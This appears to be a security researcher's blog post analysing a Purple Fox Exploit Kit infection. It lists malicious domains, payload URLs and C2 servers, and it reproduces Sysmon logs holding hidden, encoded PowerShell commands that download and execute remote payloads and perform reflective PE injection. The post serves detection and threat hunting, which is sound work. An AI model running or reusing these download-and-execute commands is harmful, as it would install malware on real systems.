Purple Fox Exploit Kit drops fileless malware

Purple Fox Exploit Kit is known to be a fileless malware distributor. I did not see a payload dropped confirming fileless activity. For a more detailed analysis on Purple Fox, see TrendMicro’s blog – https://blog.trendmicro.com/trendlabs-security-intelligence/purple-fox-fileless-malware-with-rookit-component-delivered-by-rig-exploit-kit-now-abuses-powershell/

I have added a zipped pcap file for your analysis. The password for the zipped pcap is infected all lowercase.

PCAP file of the infection traffic:
2019-12-05-PurplefoxEK-pcap.zip

 

ASSOCIATED DOMAINS:

104.24.120.105 – squeakycarworld.store – REDIRECT TO PURPLE FOX EK
172.64.109.8 – rawcdn.githack.com  GET /C9CDXGUEM39S7F1W/reddit/095f2efb735af838bfb013499b00e4263b5315e6/pe.jpg- PURPLE FOX PAYLOAD
172.64.109.8 – rawcdn.githack.com  GET /C9CDXGUEM39S7F1W/reddit/095f2efb735af838bfb013499b00e4263b5315e6/1808164.jpg – PURPLE FOX PAYLOAD
104.31.64.70 – raw.githack.xyz – – GET /PCWGZVOA1.jpg PURPLE FOX PAYLOAD
193.108.118.167 – www.gotocom.xyz – POST INFECTION C2
news.onetouchauthentication.club – DNS ONLY PURPLE FOX EK STYLE DOMAIN
193.108.118.167 – news.onetouchauthentication.icu – PURPLE FOX EK
193.108.118.167 – www.topvipsr.xyz – POST INFECTION C2
193.108.118.167 – www.topvipdg.me – POST INFECTION C2
38.75.137.14 – bestip.tech:9000 GET /preview – POST INFECTION C2
38.75.137.14 – bestip.tech:9000 GET /msg/notify/?token=gqF0zl3pWLGha84AAI2B – POST INFECTION C2

SOME ASSOCIATED PROCESS BEHAVIOR FOR HUNTING ENDPOINTS:


Shown above: Sysmon Event type 1 for a Powershell process creation containing base64 code within the commandline

SEE BELOW FOR DECODED BASE 64  – www.base64decode.org:

IEX (New-Object Net.WebClient).DownloadString(‘https://raw.githack.xyz/PCWGZVOA1.jpg‘) – Calls for payload from raw.githack.xyz

 

[Sysmon Event 3 – Powershell creating a network connect to raw.githack.xyz]
Image C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
DestinationIp 104.31.64.70
DestinationHostname
DestinationPort 443
DestinationPortName https

[Sysmon Event type 1 for a Powershell process creation containing base64 code within the commandline]
Image C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion 6.1.7600.16385 (win7_rtm.090713-1255)
Description Windows PowerShell
Product Microsoft® Windows® Operating System
Company Microsoft Corporation
CommandLine “C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe” powershell.exe -nop -windowstyle hidden -exec bypass -EncodedCommand DQAKAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBhAHcAYwBkAG4ALgBnAGkAdABoAGEAYwBrAC4AYwBvAG0ALwBDADkAQwBEAFgARwBVAEUATQAzADkAUwA3AEYAMQBXAC8AcgBlAGQAZABpAHQALwAwADkANQBmADIAZQBmAGIANwAzADUAYQBmADgAMwA4AGIAZgBiADAAMQAzADQAOQA5AGIAMAAwAGUANAAyADYAMwBiADUAMwAxADUAZQA2AC8AcABlAC4AagBwAGcAJwApADsASQBuAHYAbwBrAGUALQBSAGUAZgBsAGUAYwB0AGkAdgBlAFAARQBJAG4AagBlAGMAdABpAG8AbgAgAC0AUABFAFUAcgBsACAAaAB0AHQAcABzADoALwAvAHIAYQB3AGMAZABuAC4AZwBpAHQAaABhAGMAawAuAGMAbwBtAC8AQwA5AEMARABYAEcAVQBFAE0AMwA5AFMANwBGADEAVwAvAHIAZQBkAGQAaQB0AC8AMAA5ADUAZgAyAGUAZgBiADcAMwA1AGEAZgA4ADMAOABiAGYAYgAwADEAMwA0ADkAOQBiADAAMABlADQAMgA2ADMAYgA1ADMAMQA1AGUANgAvADEAOAAwADgAMQA2ADQALgBqAHAAZwAgAC0ARQB4AGUAQQByAGcAcwAgACcAIgBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIAAtAG4AbwBwACAALQB3AGkAbgBkAG8AdwBzAHQAeQBsAGUAIABoAGkAZABkAGUAbgAgAC0AZQB4AGUAYwAgAGIAeQBwAGEAcwBzACAALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIABEAFEAQQBLAEEARQBFAEEAWgBBAEIAawBBAEMAMABBAFYAQQBCADUAQQBIAEEAQQBaAFEAQQBnAEEAQwAwAEEAVgBBAEIANQBBAEgAQQBBAFoAUQBCAEUAQQBHAFUAQQBaAGcAQgBwAEEARwA0AEEAYQBRAEIAMABBAEcAawBBAGIAdwBCAHUAQQBDAEEAQQBRAEEAQQBpAEEAQQAwAEEAQwBnAEIAMQBBAEgATQBBAGEAUQBCAHUAQQBHAGMAQQBJAEEAQgBUAEEASABrAEEAYwB3AEIAMABBAEcAVQBBAGIAUQBBADcAQQBBADAAQQBDAGcAQgAxAEEASABNAEEAYQBRAEIAdQBBAEcAYwBBAEkAQQBCAFQAQQBIAGsAQQBjAHcAQgAwAEEARwBVAEEAYgBRAEEAdQBBAEUAUQBBAGEAUQBCAGgAQQBHAGMAQQBiAGcAQgB2AEEASABNAEEAZABBAEIAcABBAEcATQBBAGMAdwBBADcAQQBBADAAQQBDAGcAQgAxAEEASABNAEEAYQBRAEIAdQBBAEcAYwBBAEkAQQBCAFQAQQBIAGsAQQBjAHcAQgAwAEEARwBVAEEAYgBRAEEAdQBBAEYASQBBAGQAUQBCAHUAQQBIAFEAQQBhAFEAQgB0AEEARwBVAEEATABnAEIASgBBAEcANABBAGQAQQBCAGwAQQBIAEkAQQBiAHcAQgB3AEEARgBNAEEAWgBRAEIAeQBBAEgAWQBBAGEAUQBCAGoAQQBHAFUAQQBjAHcAQQA3AEEAQQAwAEEAQwBnAEIAdwBBAEgAVQBBAFkAZwBCAHMAQQBHAGsAQQBZAHcAQQBnAEEASABNAEEAZABBAEIAaABBAEgAUQBBAGEAUQBCAGoAQQBDAEEAQQBZAHcAQgBzAEEARwBFAEEAYwB3AEIAegBBAEMAQQBBAGIAUQBCAHoAQQBHAGsAQQBEAFEAQQBLAEEASABzAEEARABRAEEASwBBAEYAcwBBAFIAQQBCAHMAQQBHAHcAQQBTAFEAQgB0AEEASABBAEEAYgB3AEIAeQBBAEgAUQBBAEsAQQBBAGkAQQBHADAAQQBjAHcAQgBwAEEAQwA0AEEAWgBBAEIAcwBBAEcAdwBBAEkAZwBBAHMAQQBDAEEAQQBRAHcAQgBvAEEARwBFAEEAYwBnAEIAVABBAEcAVQBBAGQAQQBBADkAQQBFAE0AQQBhAEEAQgBoAEEASABJAEEAVQB3AEIAbABBAEgAUQBBAEwAZwBCAEIAQQBIAFUAQQBkAEEAQgB2AEEAQwBrAEEAWABRAEEATgBBAEEAbwBBAGMAQQBCADEAQQBHAEkAQQBiAEEAQgBwAEEARwBNAEEASQBBAEIAegBBAEgAUQBBAFkAUQBCADAAQQBHAGsAQQBZAHcAQQBnAEEARwBVAEEAZQBBAEIAMABBAEcAVQBBAGMAZwBCAHUAQQBDAEEAQQBhAFEAQgB1AEEASABRAEEASQBBAEIATgBBAEgATQBBAGEAUQBCAEoAQQBHADQAQQBjAHcAQgAwAEEARwBFAEEAYgBBAEIAcwBBAEYAQQBBAGMAZwBCAHYAQQBHAFEAQQBkAFEAQgBqAEEASABRAEEASwBBAEIAegBBAEgAUQBBAGMAZwBCAHAAQQBHADQAQQBaAHcAQQBnAEEASABBAEEAWQBRAEIAagBBAEcAcwBBAFkAUQBCAG4AQQBHAFUAQQBVAEEAQgBoAEEASABRAEEAYQBBAEEAcwBBAEMAQQBBAGMAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEASQBBAEIAagBBAEcAOABBAGIAUQBCAHQAQQBHAEUAQQBiAGcAQgBrAEEARQB3AEEAYQBRAEIAdQBBAEcAVQBBAEsAUQBBADcAQQBBADAAQQBDAGcAQgBiAEEARQBRAEEAYgBBAEIAcwBBAEUAawBBAGIAUQBCAHcAQQBHADgAQQBjAGcAQgAwAEEAQwBnAEEASQBnAEIAdABBAEgATQBBAGEAUQBBAHUAQQBHAFEAQQBiAEEAQgBzAEEAQwBJAEEASwBRAEIAZABBAEEAMABBAEMAZwBCAHcAQQBIAFUAQQBZAGcAQgBzAEEARwBrAEEAWQB3AEEAZwBBAEgATQBBAGQAQQBCAGgAQQBIAFEAQQBhAFEAQgBqAEEAQwBBAEEAWgBRAEIANABBAEgAUQBBAFoAUQBCAHkAQQBHADQAQQBJAEEAQgBwAEEARwA0AEEAZABBAEEAZwBBAEUAMABBAGMAdwBCAHAAQQBGAE0AQQBaAFEAQgAwAEEARQBrAEEAYgBnAEIAMABBAEcAVQBBAGMAZwBCAHUAQQBHAEUAQQBiAEEAQgBWAEEARQBrAEEASwBBAEIAcABBAEcANABBAGQAQQBBAGcAQQBHAFEAQQBkAHcAQgBWAEEARQBrAEEAVABBAEIAbABBAEgAWQBBAFoAUQBCAHMAQQBDAHcAQQBJAEEAQgBKAEEARwA0AEEAZABBAEIAUQBBAEgAUQBBAGMAZwBBAGcAQQBIAEEAQQBhAEEAQgBYAEEARwA0AEEAWgBBAEEAcABBAEQAcwBBAEQAUQBBAEsAQQBIADAAQQBEAFEAQQBLAEEAQwBJAEEAUQBBAEEATgBBAEEAbwBBAEoAQQBCAHcAQQBHAEUAQQBkAEEAQgBvAEEAQwBBAEEAUABRAEEAZwBBAEMAYwBBAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgASQBBAFkAUQBCADMAQQBDADQAQQBaAHcAQgBwAEEASABRAEEAYQBBAEIAaABBAEcATQBBAGEAdwBBAHUAQQBIAGcAQQBlAFEAQgA2AEEAQwA4AEEATQBRAEIARQBBAEUAZwBBAFUAZwBCAEMAQQBFAFkAQQBVAEEAQgBNAEEARgBvAEEAVgBBAEIARgBBAEYARQBBAFUAZwBCAFMAQQBFAEkAQQBWAFEAQgBDAEEAQwA0AEEAYQBnAEIAdwBBAEcAYwBBAEoAdwBBADcAQQBBADAAQQBDAGcAQgBiAEEARwAwAEEAYwB3AEIAcABBAEYAMABBAE8AZwBBADYAQQBFADAAQQBjAHcAQgBwAEEARgBNAEEAWgBRAEIAMABBAEUAawBBAGIAZwBCADAAQQBHAFUAQQBjAGcAQgB1AEEARwBFAEEAYgBBAEIAVgBBAEUAawBBAEsAQQBBAHkAQQBDAHcAQQBNAEEAQQBwAEEARABzAEEARABRAEEASwBBAEYAcwBBAGIAUQBCAHoAQQBHAGsAQQBYAFEAQQA2AEEARABvAEEAVABRAEIAegBBAEcAawBBAFMAUQBCAHUAQQBIAE0AQQBkAEEAQgBoAEEARwB3AEEAYgBBAEIAUQBBAEgASQBBAGIAdwBCAGsAQQBIAFUAQQBZAHcAQgAwAEEAQwBnAEEASQBnAEEAawBBAEgAQQBBAFkAUQBCADAAQQBHAGcAQQBJAGcAQQBzAEEAQwBJAEEASQBnAEEAcABBAEEAMABBAEMAZwBBAD0AIgAnACAALQBGAG8AcgBjAGUAQQANAAoA
CurrentDirectory C:\Users\Ricky\Desktop\
Hashes MD5=852D67A27E454BD389FA7F02A8CBE23F
ParentImage C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” -nop -windowstyle hidden -exec bypass -EncodedCommand DQAKAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBhAHcALgBnAGkAdABoAGEAYwBrAC4AeAB5AHoALwBQAEMAVwBHAFoAVgBPAEEAMQAuAGoAcABnACcAKQANAAoA

SEE BELOW FOR DECODED BASE 64  – www.base64decode.org:

IEX (New-Object Net.WebClient).DownloadString(‘https://rawcdn.githack.com/C9CDXGUEM39S7F1W/reddit/095f2efb735af838bfb013499b00e4263b5315e6/pe.jpg‘);Invoke-ReflectivePEInjection -PEUrl https://rawcdn.githack.com/C9CDXGUEM39S7F1W/reddit/095f2efb735af838bfb013499b00e4263b5315e6/1808164.jpg -ExeArgs ‘”powershell.exe -nop -windowstyle hidden -exec bypass -EncodedCommand DQAKAEEAZABkAC0AVAB5AHAAZQAgAC0AVAB5AHAAZQBEAGUAZgBpAG4AaQB0AGkAbwBuACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAYwBsAGEAcwBzACAAbQBzAGkADQAKAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwBpAC4AZABsAGwAIgAsACAAQwBoAGEAcgBTAGUAdAA9AEMAaABhAHIAUwBlAHQALgBBAHUAdABvACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAaQBuAHQAIABNAHMAaQBJAG4AcwB0AGEAbABsAFAAcgBvAGQAdQBjAHQAKABzAHQAcgBpAG4AZwAgAHAAYQBjAGsAYQBnAGUAUABhAHQAaAAsACAAcwB0AHIAaQBuAGcAIABjAG8AbQBtAGEAbgBkAEwAaQBuAGUAKQA7AA0ACgBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBtAHMAaQAuAGQAbABsACIAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABpAG4AdAAgAE0AcwBpAFMAZQB0AEkAbgB0AGUAcgBuAGEAbABVAEkAKABpAG4AdAAgAGQAdwBVAEkATABlAHYAZQBsACwAIABJAG4AdABQAHQAcgAgAHAAaABXAG4AZAApADsADQAKAH0ADQAKACIAQAANAAoAJABwAGEAdABoACAAPQAgACcAaAB0AHQAcABzADoALwAvAHIAYQB3AC4AZwBpAHQAaABhAGMAawAuAHgAeQB6AC8AMQBEAEgAUgBCAEYAUABMAFoAVABFAFEAUgBSAEIAVQBCAC4AagBwAGcAJwA7AA0ACgBbAG0AcwBpAF0AOgA6AE0AcwBpAFMAZQB0AEkAbgB0AGUAcgBuAGEAbABVAEkAKAAyACwAMAApADsADQAKAFsAbQBzAGkAXQA6ADoATQBzAGkASQBuAHMAdABhAGwAbABQAHIAbwBkAHUAYwB0ACgAIgAkAHAAYQB0AGgAIgAsACIAIgApAA0ACgA=”‘ -ForceA

I PROVIDED THE REMAINING PROCESS CREATION AND NETWORK CONNECTIONS FOR ADDITIONAL RESEARCH AGAINST THE MITRE ATTACK FRAMEWORK – https://attack.mitre.org/

[Sysmon Event type 1]
Image C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion 6.1.7600.16385 (win7_rtm.090713-1255)
Description Windows PowerShell
Product Microsoft® Windows® Operating System
Company Microsoft Corporation
CommandLine “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” -nop -windowstyle hidden -exec bypass -EncodedCommand DQAKAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBhAHcAYwBkAG4ALgBnAGkAdABoAGEAYwBrAC4AYwBvAG0ALwBDADkAQwBEAFgARwBVAEUATQAzADkAUwA3AEYAMQBXAC8AcgBlAGQAZABpAHQALwAwADkANQBmADIAZQBmAGIANwAzADUAYQBmADgAMwA4AGIAZgBiADAAMQAzADQAOQA5AGIAMAAwAGUANAAyADYAMwBiADUAMwAxADUAZQA2AC8AcABlAC4AagBwAGcAJwApADsASQBuAHYAbwBrAGUALQBSAGUAZgBsAGUAYwB0AGkAdgBlAFAARQBJAG4AagBlAGMAdABpAG8AbgAgAC0AUABFAFUAcgBsACAAaAB0AHQAcABzADoALwAvAHIAYQB3AGMAZABuAC4AZwBpAHQAaABhAGMAawAuAGMAbwBtAC8AQwA5AEMARABYAEcAVQBFAE0AMwA5AFMANwBGADEAVwAvAHIAZQBkAGQAaQB0AC8AMAA5ADUAZgAyAGUAZgBiADcAMwA1AGEAZgA4ADMAOABiAGYAYgAwADEAMwA0ADkAOQBiADAAMABlADQAMgA2ADMAYgA1ADMAMQA1AGUANgAvADEAOAAwADgAMQA2ADQALgBqAHAAZwAgAC0ARQB4AGUAQQByAGcAcwAgACcAIgBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIAAtAG4AbwBwACAALQB3AGkAbgBkAG8AdwBzAHQAeQBsAGUAIABoAGkAZABkAGUAbgAgAC0AZQB4AGUAYwAgAGIAeQBwAGEAcwBzACAALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIABEAFEAQQBLAEEARQBFAEEAWgBBAEIAawBBAEMAMABBAFYAQQBCADUAQQBIAEEAQQBaAFEAQQBnAEEAQwAwAEEAVgBBAEIANQBBAEgAQQBBAFoAUQBCAEUAQQBHAFUAQQBaAGcAQgBwAEEARwA0AEEAYQBRAEIAMABBAEcAawBBAGIAdwBCAHUAQQBDAEEAQQBRAEEAQQBpAEEAQQAwAEEAQwBnAEIAMQBBAEgATQBBAGEAUQBCAHUAQQBHAGMAQQBJAEEAQgBUAEEASABrAEEAYwB3AEIAMABBAEcAVQBBAGIAUQBBADcAQQBBADAAQQBDAGcAQgAxAEEASABNAEEAYQBRAEIAdQBBAEcAYwBBAEkAQQBCAFQAQQBIAGsAQQBjAHcAQgAwAEEARwBVAEEAYgBRAEEAdQBBAEUAUQBBAGEAUQBCAGgAQQBHAGMAQQBiAGcAQgB2AEEASABNAEEAZABBAEIAcABBAEcATQBBAGMAdwBBADcAQQBBADAAQQBDAGcAQgAxAEEASABNAEEAYQBRAEIAdQBBAEcAYwBBAEkAQQBCAFQAQQBIAGsAQQBjAHcAQgAwAEEARwBVAEEAYgBRAEEAdQBBAEYASQBBAGQAUQBCAHUAQQBIAFEAQQBhAFEAQgB0AEEARwBVAEEATABnAEIASgBBAEcANABBAGQAQQBCAGwAQQBIAEkAQQBiAHcAQgB3AEEARgBNAEEAWgBRAEIAeQBBAEgAWQBBAGEAUQBCAGoAQQBHAFUAQQBjAHcAQQA3AEEAQQAwAEEAQwBnAEIAdwBBAEgAVQBBAFkAZwBCAHMAQQBHAGsAQQBZAHcAQQBnAEEASABNAEEAZABBAEIAaABBAEgAUQBBAGEAUQBCAGoAQQBDAEEAQQBZAHcAQgBzAEEARwBFAEEAYwB3AEIAegBBAEMAQQBBAGIAUQBCAHoAQQBHAGsAQQBEAFEAQQBLAEEASABzAEEARABRAEEASwBBAEYAcwBBAFIAQQBCAHMAQQBHAHcAQQBTAFEAQgB0AEEASABBAEEAYgB3AEIAeQBBAEgAUQBBAEsAQQBBAGkAQQBHADAAQQBjAHcAQgBwAEEAQwA0AEEAWgBBAEIAcwBBAEcAdwBBAEkAZwBBAHMAQQBDAEEAQQBRAHcAQgBvAEEARwBFAEEAYwBnAEIAVABBAEcAVQBBAGQAQQBBADkAQQBFAE0AQQBhAEEAQgBoAEEASABJAEEAVQB3AEIAbABBAEgAUQBBAEwAZwBCAEIAQQBIAFUAQQBkAEEAQgB2AEEAQwBrAEEAWABRAEEATgBBAEEAbwBBAGMAQQBCADEAQQBHAEkAQQBiAEEAQgBwAEEARwBNAEEASQBBAEIAegBBAEgAUQBBAFkAUQBCADAAQQBHAGsAQQBZAHcAQQBnAEEARwBVAEEAZQBBAEIAMABBAEcAVQBBAGMAZwBCAHUAQQBDAEEAQQBhAFEAQgB1AEEASABRAEEASQBBAEIATgBBAEgATQBBAGEAUQBCAEoAQQBHADQAQQBjAHcAQgAwAEEARwBFAEEAYgBBAEIAcwBBAEYAQQBBAGMAZwBCAHYAQQBHAFEAQQBkAFEAQgBqAEEASABRAEEASwBBAEIAegBBAEgAUQBBAGMAZwBCAHAAQQBHADQAQQBaAHcAQQBnAEEASABBAEEAWQBRAEIAagBBAEcAcwBBAFkAUQBCAG4AQQBHAFUAQQBVAEEAQgBoAEEASABRAEEAYQBBAEEAcwBBAEMAQQBBAGMAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEASQBBAEIAagBBAEcAOABBAGIAUQBCAHQAQQBHAEUAQQBiAGcAQgBrAEEARQB3AEEAYQBRAEIAdQBBAEcAVQBBAEsAUQBBADcAQQBBADAAQQBDAGcAQgBiAEEARQBRAEEAYgBBAEIAcwBBAEUAawBBAGIAUQBCAHcAQQBHADgAQQBjAGcAQgAwAEEAQwBnAEEASQBnAEIAdABBAEgATQBBAGEAUQBBAHUAQQBHAFEAQQBiAEEAQgBzAEEAQwBJAEEASwBRAEIAZABBAEEAMABBAEMAZwBCAHcAQQBIAFUAQQBZAGcAQgBzAEEARwBrAEEAWQB3AEEAZwBBAEgATQBBAGQAQQBCAGgAQQBIAFEAQQBhAFEAQgBqAEEAQwBBAEEAWgBRAEIANABBAEgAUQBBAFoAUQBCAHkAQQBHADQAQQBJAEEAQgBwAEEARwA0AEEAZABBAEEAZwBBAEUAMABBAGMAdwBCAHAAQQBGAE0AQQBaAFEAQgAwAEEARQBrAEEAYgBnAEIAMABBAEcAVQBBAGMAZwBCAHUAQQBHAEUAQQBiAEEAQgBWAEEARQBrAEEASwBBAEIAcABBAEcANABBAGQAQQBBAGcAQQBHAFEAQQBkAHcAQgBWAEEARQBrAEEAVABBAEIAbABBAEgAWQBBAFoAUQBCAHMAQQBDAHcAQQBJAEEAQgBKAEEARwA0AEEAZABBAEIAUQBBAEgAUQBBAGMAZwBBAGcAQQBIAEEAQQBhAEEAQgBYAEEARwA0AEEAWgBBAEEAcABBAEQAcwBBAEQAUQBBAEsAQQBIADAAQQBEAFEAQQBLAEEAQwBJAEEAUQBBAEEATgBBAEEAbwBBAEoAQQBCAHcAQQBHAEUAQQBkAEEAQgBvAEEAQwBBAEEAUABRAEEAZwBBAEMAYwBBAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgASQBBAFkAUQBCADMAQQBDADQAQQBaAHcAQgBwAEEASABRAEEAYQBBAEIAaABBAEcATQBBAGEAdwBBAHUAQQBIAGcAQQBlAFEAQgA2AEEAQwA4AEEATQBRAEIARQBBAEUAZwBBAFUAZwBCAEMAQQBFAFkAQQBVAEEAQgBNAEEARgBvAEEAVgBBAEIARgBBAEYARQBBAFUAZwBCAFMAQQBFAEkAQQBWAFEAQgBDAEEAQwA0AEEAYQBnAEIAdwBBAEcAYwBBAEoAdwBBADcAQQBBADAAQQBDAGcAQgBiAEEARwAwAEEAYwB3AEIAcABBAEYAMABBAE8AZwBBADYAQQBFADAAQQBjAHcAQgBwAEEARgBNAEEAWgBRAEIAMABBAEUAawBBAGIAZwBCADAAQQBHAFUAQQBjAGcAQgB1AEEARwBFAEEAYgBBAEIAVgBBAEUAawBBAEsAQQBBAHkAQQBDAHcAQQBNAEEAQQBwAEEARABzAEEARABRAEEASwBBAEYAcwBBAGIAUQBCAHoAQQBHAGsAQQBYAFEAQQA2AEEARABvAEEAVABRAEIAegBBAEcAawBBAFMAUQBCAHUAQQBIAE0AQQBkAEEAQgBoAEEARwB3AEEAYgBBAEIAUQBBAEgASQBBAGIAdwBCAGsAQQBIAFUAQQBZAHcAQgAwAEEAQwBnAEEASQBnAEEAawBBAEgAQQBBAFkAUQBCADAAQQBHAGcAQQBJAGcAQQBzAEEAQwBJAEEASQBnAEEAcABBAEEAMABBAEMAZwBBAD0AIgAnACAALQBGAG8AcgBjAGUAQQANAAoA
CurrentDirectory C:\Users\Ricky\Desktop\
Hashes MD5=852D67A27E454BD389FA7F02A8CBE23F
ParentImage C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine “C:\Windows\sysnative\WindowsPowerShell\v1.0\powershell.exe” powershell.exe -nop -windowstyle hidden -exec bypass -EncodedCommand DQAKAEkARQBYACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcgBhAHcAYwBkAG4ALgBnAGkAdABoAGEAYwBrAC4AYwBvAG0ALwBDADkAQwBEAFgARwBVAEUATQAzADkAUwA3AEYAMQBXAC8AcgBlAGQAZABpAHQALwAwADkANQBmADIAZQBmAGIANwAzADUAYQBmADgAMwA4AGIAZgBiADAAMQAzADQAOQA5AGIAMAAwAGUANAAyADYAMwBiADUAMwAxADUAZQA2AC8AcABlAC4AagBwAGcAJwApADsASQBuAHYAbwBrAGUALQBSAGUAZgBsAGUAYwB0AGkAdgBlAFAARQBJAG4AagBlAGMAdABpAG8AbgAgAC0AUABFAFUAcgBsACAAaAB0AHQAcABzADoALwAvAHIAYQB3AGMAZABuAC4AZwBpAHQAaABhAGMAawAuAGMAbwBtAC8AQwA5AEMARABYAEcAVQBFAE0AMwA5AFMANwBGADEAVwAvAHIAZQBkAGQAaQB0AC8AMAA5ADUAZgAyAGUAZgBiADcAMwA1AGEAZgA4ADMAOABiAGYAYgAwADEAMwA0ADkAOQBiADAAMABlADQAMgA2ADMAYgA1ADMAMQA1AGUANgAvADEAOAAwADgAMQA2ADQALgBqAHAAZwAgAC0ARQB4AGUAQQByAGcAcwAgACcAIgBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIAAtAG4AbwBwACAALQB3AGkAbgBkAG8AdwBzAHQAeQBsAGUAIABoAGkAZABkAGUAbgAgAC0AZQB4AGUAYwAgAGIAeQBwAGEAcwBzACAALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIABEAFEAQQBLAEEARQBFAEEAWgBBAEIAawBBAEMAMABBAFYAQQBCADUAQQBIAEEAQQBaAFEAQQBnAEEAQwAwAEEAVgBBAEIANQBBAEgAQQBBAFoAUQBCAEUAQQBHAFUAQQBaAGcAQgBwAEEARwA0AEEAYQBRAEIAMABBAEcAawBBAGIAdwBCAHUAQQBDAEEAQQBRAEEAQQBpAEEAQQAwAEEAQwBnAEIAMQBBAEgATQBBAGEAUQBCAHUAQQBHAGMAQQBJAEEAQgBUAEEASABrAEEAYwB3AEIAMABBAEcAVQBBAGIAUQBBADcAQQBBADAAQQBDAGcAQgAxAEEASABNAEEAYQBRAEIAdQBBAEcAYwBBAEkAQQBCAFQAQQBIAGsAQQBjAHcAQgAwAEEARwBVAEEAYgBRAEEAdQBBAEUAUQBBAGEAUQBCAGgAQQBHAGMAQQBiAGcAQgB2AEEASABNAEEAZABBAEIAcABBAEcATQBBAGMAdwBBADcAQQBBADAAQQBDAGcAQgAxAEEASABNAEEAYQBRAEIAdQBBAEcAYwBBAEkAQQBCAFQAQQBIAGsAQQBjAHcAQgAwAEEARwBVAEEAYgBRAEEAdQBBAEYASQBBAGQAUQBCAHUAQQBIAFEAQQBhAFEAQgB0AEEARwBVAEEATABnAEIASgBBAEcANABBAGQAQQBCAGwAQQBIAEkAQQBiAHcAQgB3AEEARgBNAEEAWgBRAEIAeQBBAEgAWQBBAGEAUQBCAGoAQQBHAFUAQQBjAHcAQQA3AEEAQQAwAEEAQwBnAEIAdwBBAEgAVQBBAFkAZwBCAHMAQQBHAGsAQQBZAHcAQQBnAEEASABNAEEAZABBAEIAaABBAEgAUQBBAGEAUQBCAGoAQQBDAEEAQQBZAHcAQgBzAEEARwBFAEEAYwB3AEIAegBBAEMAQQBBAGIAUQBCAHoAQQBHAGsAQQBEAFEAQQBLAEEASABzAEEARABRAEEASwBBAEYAcwBBAFIAQQBCAHMAQQBHAHcAQQBTAFEAQgB0AEEASABBAEEAYgB3AEIAeQBBAEgAUQBBAEsAQQBBAGkAQQBHADAAQQBjAHcAQgBwAEEAQwA0AEEAWgBBAEIAcwBBAEcAdwBBAEkAZwBBAHMAQQBDAEEAQQBRAHcAQgBvAEEARwBFAEEAYwBnAEIAVABBAEcAVQBBAGQAQQBBADkAQQBFAE0AQQBhAEEAQgBoAEEASABJAEEAVQB3AEIAbABBAEgAUQBBAEwAZwBCAEIAQQBIAFUAQQBkAEEAQgB2AEEAQwBrAEEAWABRAEEATgBBAEEAbwBBAGMAQQBCADEAQQBHAEkAQQBiAEEAQgBwAEEARwBNAEEASQBBAEIAegBBAEgAUQBBAFkAUQBCADAAQQBHAGsAQQBZAHcAQQBnAEEARwBVAEEAZQBBAEIAMABBAEcAVQBBAGMAZwBCAHUAQQBDAEEAQQBhAFEAQgB1AEEASABRAEEASQBBAEIATgBBAEgATQBBAGEAUQBCAEoAQQBHADQAQQBjAHcAQgAwAEEARwBFAEEAYgBBAEIAcwBBAEYAQQBBAGMAZwBCAHYAQQBHAFEAQQBkAFEAQgBqAEEASABRAEEASwBBAEIAegBBAEgAUQBBAGMAZwBCAHAAQQBHADQAQQBaAHcAQQBnAEEASABBAEEAWQBRAEIAagBBAEcAcwBBAFkAUQBCAG4AQQBHAFUAQQBVAEEAQgBoAEEASABRAEEAYQBBAEEAcwBBAEMAQQBBAGMAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAS